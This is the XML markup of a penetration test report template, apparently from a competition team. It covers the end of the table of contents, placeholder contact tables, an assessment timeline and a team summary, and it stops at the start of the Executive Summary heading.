              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="2A3295C8" w14:textId="35EC95A5">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645205">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7. Appendix</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645205 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="71A8F1B2" w14:textId="7D51443C">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645206">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.1 Pentest Methodology - MITRE ATT&amp;CK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645206 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="794D23E9" w14:textId="6A5EE147">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645207">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2 Pentest Methodology - OWASP</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645207 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="1F67915D" w14:textId="6D32086C">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645208">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.3 Vulnerability Classification - CVSS v3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645208 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00352154" w:rsidRDefault="00352154" w14:paraId="63407007" w14:textId="49CD2839">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10534"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:kern w:val="2"/>
              <w:lang w:eastAsia="ja-JP" w:bidi="ar-SA"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:history="1" w:anchor="_Toc180645209">
            <w:r w:rsidRPr="008F144B">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>7.2 Tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc180645209 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000034" w14:textId="3A16B52E">
          <w:pPr>
            <w:widowControl w:val="0"/>
            <w:pBdr>
              <w:top w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
              <w:left w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
              <w:bottom w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
              <w:right w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
              <w:between w:val="none" w:color="FF000000" w:sz="0" w:space="0"/>
            </w:pBdr>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="12000"/>
            </w:tabs>
            <w:spacing w:before="60" w:line="240" w:lineRule="auto"/>
            <w:ind w:left="360" w:right="0"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="00000035" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:smallCaps w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0085413F" w14:paraId="00000036" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A74C9BE" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="216E1E30" w14:textId="3C3C1791">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645180" w:id="0"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>1 {</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Contact Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000038" w14:textId="7F508C4A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645181" w:id="1"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 </w:t>
      </w:r>
      <w:commentRangeStart w:id="2"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Contact Information</w:t>
      </w:r>
      <w:commentRangeEnd w:id="2"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
        </w:rPr>
        <w:commentReference w:id="2"/>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000039" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Company Contact:</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9491" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="7091"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="32F6B64D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400"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C6D9E0"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000003A" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Email Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7091"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000003B" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>newengland</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>-@</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>cptc.team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="3DBC6950" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400"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C6D9E0"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000003C" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Phone Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7091"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000003D" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>123-456-7890</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="00027506" w14:paraId="0000003E" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000003F" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Project Lead Contact:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9475" w:type="dxa"/>
        <w:tblInd w:w="10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="7060"/>
      </w:tblGrid>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="0020E487" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415"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C6D9E0"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000040" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Project Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000041" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>Powall</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t xml:space="preserve"> W</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="08EBC6F1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415"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C6D9E0"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000042" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Email Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000043" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>newengland</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>-@</w:t>
            </w:r>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>cptc.team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00027506" w:rsidTr="2FBCE143" w14:paraId="583BD25C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415"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C6D9E0"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000044" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
              </w:rPr>
              <w:t>Phone Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7060"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auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000045" w14:textId="77777777">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:right="0"/>
            </w:pPr>
            <w:r w:rsidR="2FBCE143">
              <w:rPr/>
              <w:t>123-456-7890</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000046" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645182" w:id="3"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>1.2 Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidR="5A74C9BE" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="123C42D7" w14:textId="30F603D5">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{name} completed a Vendor Security Assessment on 8/30/2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5A74C9BE" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="40079A48" w14:textId="791365B6">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>{name} was contracted to perform a security assessment on {company.name} on 9/8/2024.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000047" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>The testing activities were performed between 11/02/2024 10 AM - 6 PM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000048" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645183" w:id="4"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 Team </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="00000049" w14:textId="77777777">
      <w:pPr>
        <w:ind w:right="0"/>
      </w:pPr>
      <w:bookmarkStart w:name="_heading=h.tyjcwt" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve">{name} provided a team of six experienced penetration testers with domain knowledge in Network, Web, Active Directory, and Cloud security. Each team member was given access to the company environment for 8 hours on November 2nd, </w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t>2024</w:t>
      </w:r>
      <w:r w:rsidR="2FBCE143">
        <w:rPr/>
        <w:t xml:space="preserve"> with the final report being delivered on November 3rd, 2024.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00027506" w:rsidP="2FBCE143" w:rsidRDefault="0FB6339A" w14:paraId="0000004A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:ind w:right="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc180645184" w:id="6"/>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t>Executive</w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
          <w:rFonts w:eastAsia="IBM Plex Sans"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="2FBCE143" w:rsidR="2FBCE143">
        <w:rPr>
